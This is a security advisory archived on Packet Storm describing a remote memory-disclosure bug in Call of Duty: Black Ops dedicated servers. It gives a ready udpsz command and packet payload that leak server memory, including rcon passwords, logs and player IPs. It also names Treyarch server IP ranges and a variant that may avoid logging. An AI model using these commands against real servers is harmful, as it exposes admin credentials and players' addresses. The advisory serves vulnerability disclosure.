what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Call Of Duty: Black Ops Memory Leak

Call Of Duty: Black Ops Memory Leak
Posted Dec 3, 2010
Authored by Luigi Auriemma | Site aluigi.org

Call of Duty: Black Ops suffers from a remote memory leak vulnerability.

tags | advisory, remote, memory leak
SHA-256 | 23f747fc13e4561d98d08374160cabdd2ae8c84df6b37dd2a2b12bf9451bf8d1

Call Of Duty: Black Ops Memory Leak

Change Mirror Download
#######################################################################

Luigi Auriemma

Application: Call of Duty: Black Ops
http://www.callofduty.com
Versions: unknown, refer to the release date of this advisory
Platforms: unknown (it should be Windows)
Bug: memory leak
Exploitation: remote, versus server
Date: 18 Nov 2010
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Call of Duty Black Ops (cod7) is the new game of the CoD series.
Just like cod6 also this one is distribuited as "client-only", which
means that a normal user cannot host a server.
Only some hosting companies (GameServers) or the same Treyarch can host
dedicated servers.


#######################################################################

======
2) Bug
======


When the server receives an rcon packet (opcode 0x00) it replies with
a packet having a fixed size of 1168 bytes, doesn't matter if its
content is smaller.

The result is that various parts of the server's memory are disclosed
remotely to anyone and through the continuous sending of these invalid
rcon packets is possible to monitor the server and maybe retrieving
important informations like the value of cvars (included rcon), parts
of the logs (included the output of previous rcon packets of the
admin), parts of the server's configuration and the IP addresses of the
other players.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
http://aluigi.org/poc/cod7mem.zip

udpsz -C "ffffffff 00 0000000000000000" -D SERVER 3074 -1

or with the filter for easier visualization and monitoring:

udpsz -q -l 1000 -C "ffffffff 00 0000000000000000" -D -L cod7mem.dll SERVER 3074 -1

for example the Treyarch servers are available in a certain range that
covers different C classes like 173.199.77.x, 173.199.78.x, 173.199.79.x
and so on.

it's possible to use "ffffffff 00 6100000000000000" for receiving a
reply string shorter than 50 bytes and so more memory visible but I
don't know if it will appear in the server's logs because it could be
considered a password guessing attack.


#######################################################################

======
4) Fix
======


No fix.


#######################################################################


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close